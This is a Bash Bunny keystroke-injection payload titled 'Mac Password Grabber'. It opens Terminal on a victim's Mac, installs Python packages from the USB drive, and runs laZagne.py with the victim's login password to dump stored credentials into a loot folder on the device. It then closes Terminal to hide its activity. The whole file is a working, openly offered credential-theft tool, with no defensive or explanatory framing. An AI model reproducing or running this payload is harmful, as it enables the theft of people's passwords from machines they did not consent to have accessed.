#!/bin/bash
#
# Title:         Mac Password Grabber
# Author:        Overtimedev
# Version:       1.0
#
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass 
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
#
# Amber..............Executing payload
# Green..............Finished
#

LED G R
ATTACKMODE HID STORAGE

lootdir=loot/MacPass
mkdir -p /root/udisk/$lootdir

QUACK GUI SPACE
QUACK DELAY 1000
QUACK STRING terminal
QUACK ENTER
QUACK DELAY 3000
QUACK STRING cd /Volumes/BashBunny/
QUACK ENTER
QUACK DELAY 1000
QUACK STRING python get-pip.py
QUACK ENTER
QUACK DELAY 3000
QUACK STRING pip install -r requirements.txt
QUACK ENTER
QUACK DELAY 3000
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
QUACK ENTER
QUACK DELAY 10000
QUACK STRING killall Terminal
QUACK ENTER

# Sync filesystem
sync

# Green LED for finished
LED G
